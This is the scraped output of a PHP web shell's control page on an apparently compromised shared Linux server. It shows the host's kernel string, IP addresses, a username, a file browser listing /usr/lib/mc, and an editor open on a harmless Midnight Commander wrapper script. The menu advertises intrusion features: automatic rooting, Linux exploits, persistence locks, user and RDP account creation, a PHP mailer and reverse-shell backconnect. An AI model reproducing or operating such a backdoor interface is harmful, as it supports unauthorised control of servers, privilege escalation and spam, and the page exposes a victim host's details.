Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
mc /
[ HOME SHELL ]
Name
Size
Permission
Action
ext.d
[ DIR ]
drwxr-xr-x
extfs.d
[ DIR ]
drwxr-xr-x
fish
[ DIR ]
drwxr-xr-x
cons.saver
14.3
KB
-rwxr-sr-x
mc-wrapper.csh
402
B
-rwxr-xr-x
mc-wrapper.sh
334
B
-rwxr-xr-x
mc.csh
45
B
-rwxr-xr-x
mc.sh
149
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mc-wrapper.csh
set MC_USER=`whoami` if ($?TMPDIR) then setenv MC_PWD_FILE $TMPDIR/mc-$MC_USER/mc.pwd.$$ else setenv MC_PWD_FILE /tmp/mc-$MC_USER/mc.pwd.$$ endif /usr/bin/mc -P "$MC_PWD_FILE" $* if (-r "$MC_PWD_FILE") then setenv MC_PWD "`cat '$MC_PWD_FILE'`" if ("$MC_PWD" != "$cwd" && -d "$MC_PWD") then cd "$MC_PWD" endif unsetenv MC_PWD endif rm -f "$MC_PWD_FILE" unsetenv MC_PWD_FILE unsetenv MC_USER
Close